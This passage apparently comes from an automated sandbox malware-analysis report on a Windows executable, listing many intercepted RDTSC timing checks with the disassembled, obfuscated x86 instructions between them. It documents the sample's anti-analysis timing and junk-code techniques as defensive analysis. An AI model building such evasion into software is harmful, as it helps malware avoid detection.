                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1270F second address: A12734 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44E7DD73h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0C44E7DD6Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12404 second address: A1240E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0C44D4E186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A132B3 second address: A132B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12F8C second address: A12F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13D28 second address: A13D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A14884 second address: A1488A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1488A second address: A1492C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0C44E7DD70h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F0C44E7DD68h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov esi, 3CA0FB74h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F0C44E7DD68h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007F0C44E7DD68h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 0000001Ch 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 xchg eax, ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F0C44E7DD72h 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1492C second address: A14932 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A14932 second address: A14949 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44E7DD6Ch 0x00000008 jc 00007F0C44E7DD66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A151C0 second address: A151DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E196h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A151DA second address: A151F6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44E7DD68h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F0C44E7DD74h 0x00000013 pushad 0x00000014 jc 00007F0C44E7DD66h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1779F second address: A177B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jbe 00007F0C44D4E186h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jng 00007F0C44D4E186h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19636 second address: A1963A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1963A second address: A19640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19640 second address: A196D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0C44E7DD6Eh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jne 00007F0C44E7DD6Ah 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F0C44E7DD68h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D1E3Fh], esi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F0C44E7DD68h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 jnp 00007F0C44E7DD68h 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F0C44E7DD76h 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A196D0 second address: A196D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A196D6 second address: A196DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A669 second address: A1A66F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A66F second address: A1A673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A673 second address: A1A6E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F0C44D4E188h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 and bh, 0000004Ah 0x0000002b push 00000000h 0x0000002d jl 00007F0C44D4E18Ch 0x00000033 mov dword ptr [ebp+122D1D6Bh], esi 0x00000039 push 00000000h 0x0000003b mov di, 2013h 0x0000003f and edi, 5DC1A71Ah 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 jnc 00007F0C44D4E186h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A6E1 second address: A1A6EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44E7DD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B707 second address: A1B711 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0C44D4E186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B711 second address: A1B793 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F0C44E7DD68h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 jmp 00007F0C44E7DD6Ch 0x0000002a push 00000000h 0x0000002c jns 00007F0C44E7DD67h 0x00000032 mov edi, ecx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F0C44E7DD68h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 js 00007F0C44E7DD71h 0x00000056 pushad 0x00000057 mov si, 0338h 0x0000005b xor ax, D267h 0x00000060 popad 0x00000061 cld 0x00000062 xchg eax, esi 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push edx 0x00000067 pop edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1986E second address: A19872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19872 second address: A19897 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44E7DD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0C44E7DD73h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19897 second address: A198A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E18Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A198A5 second address: A198AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A199A6 second address: A199CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007F0C44D4E198h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1CA18 second address: A1CA1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E6FA second address: A1E6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E6FE second address: A1E702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E702 second address: A1E77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F0C44D4E188h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D3B88h], edi 0x0000002a push 00000000h 0x0000002c mov edi, edx 0x0000002e push 00000000h 0x00000030 or bx, 3900h 0x00000035 xchg eax, esi 0x00000036 pushad 0x00000037 jmp 00007F0C44D4E196h 0x0000003c jmp 00007F0C44D4E197h 0x00000041 popad 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F0C44D4E18Ah 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D90E second address: A1D962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F0C44E7DD66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F0C44E7DD6Dh 0x00000016 push dword ptr fs:[00000000h] 0x0000001d add bl, FFFFFFE9h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov edi, 46D0C100h 0x0000002c mov eax, dword ptr [ebp+122D0371h] 0x00000032 mov ebx, 374A66BFh 0x00000037 push FFFFFFFFh 0x00000039 mov dword ptr [ebp+12450379h], edi 0x0000003f nop 0x00000040 push ecx 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 pop edx 0x00000045 pop ecx 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D962 second address: A1D969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A215C3 second address: A215D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A215D1 second address: A215D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A215D5 second address: A2163A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F0C44E7DD6Ch 0x0000000f pop esi 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 jmp 00007F0C44E7DD70h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F0C44E7DD68h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov di, si 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a push edi 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A226C5 second address: A226C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2275E second address: A22762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A228BB second address: A22972 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F0C44D4E186h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007F0C44D4E19Ch 0x00000013 nop 0x00000014 mov bx, 1DE6h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F0C44D4E188h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov edi, dword ptr [ebp+122D2D77h] 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 mov edi, dword ptr [ebp+122D2E0Bh] 0x0000004c jmp 00007F0C44D4E192h 0x00000051 mov eax, dword ptr [ebp+122D005Dh] 0x00000057 mov dword ptr [ebp+122D3927h], esi 0x0000005d push FFFFFFFFh 0x0000005f push 00000000h 0x00000061 push esi 0x00000062 call 00007F0C44D4E188h 0x00000067 pop esi 0x00000068 mov dword ptr [esp+04h], esi 0x0000006c add dword ptr [esp+04h], 00000016h 0x00000074 inc esi 0x00000075 push esi 0x00000076 ret 0x00000077 pop esi 0x00000078 ret 0x00000079 mov ebx, edi 0x0000007b push eax 0x0000007c je 00007F0C44D4E194h 0x00000082 push eax 0x00000083 push edx 0x00000084 jnp 00007F0C44D4E186h 0x0000008a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24846 second address: A2484A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2484A second address: A24850 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23908 second address: A2390C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24850 second address: A2487C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0C44D4E18Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0C44D4E198h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2487C second address: A248EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d call 00007F0C44E7DD74h 0x00000012 mov di, bx 0x00000015 pop ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F0C44E7DD68h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 movzx ebx, ax 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push edx 0x00000039 jmp 00007F0C44E7DD79h 0x0000003e pop edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A248EE second address: A248F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A239E2 second address: A239EC instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44E7DD6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25A4B second address: A25A9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 xor dword ptr [ebp+122D2795h], esi 0x0000000e push 00000000h 0x00000010 jbe 00007F0C44D4E191h 0x00000016 pushad 0x00000017 movzx ebx, dx 0x0000001a jno 00007F0C44D4E186h 0x00000020 popad 0x00000021 xor edi, dword ptr [ebp+122D2AFBh] 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F0C44D4E188h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 stc 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push esi 0x00000048 jbe 00007F0C44D4E186h 0x0000004e pop esi 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A24 second address: A24A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A2A second address: A24A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A2E second address: A24A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26BF7 second address: A26BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25C6E second address: A25C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25C73 second address: A25C99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0C44D4E199h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25C99 second address: A25C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25C9F second address: A25D5B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C44D4E186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D233Dh], ecx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a cld 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F0C44D4E188h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c jp 00007F0C44D4E194h 0x00000042 mov eax, dword ptr [ebp+122D0AF5h] 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007F0C44D4E188h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 00000017h 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 add dword ptr [ebp+122D1E92h], edi 0x00000068 sub dword ptr [ebp+122D38C5h], edi 0x0000006e push FFFFFFFFh 0x00000070 adc edi, 300F7CF1h 0x00000076 call 00007F0C44D4E199h 0x0000007b movsx edi, di 0x0000007e pop edi 0x0000007f nop 0x00000080 pushad 0x00000081 jmp 00007F0C44D4E18Ch 0x00000086 push eax 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25D5B second address: A25D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25D5F second address: A25D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F0C44D4E186h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26D0F second address: A26D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26D14 second address: A26D3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0C44D4E186h 0x00000009 jmp 00007F0C44D4E18Fh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jg 00007F0C44D4E186h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26D3C second address: A26D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0C44E7DD66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D360F second address: 9D3626 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0C44D4E18Bh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3626 second address: 9D363B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44E7DD6Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D32A second address: A2D32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D32E second address: A2D345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44E7DD71h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D345 second address: A2D34F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0C44D4E18Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D34F second address: A2D356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D4D8 second address: A2D4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D4DC second address: A2D4F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0C44E7DD6Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F0C44E7DD6Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3564D second address: A35651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35651 second address: A35657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
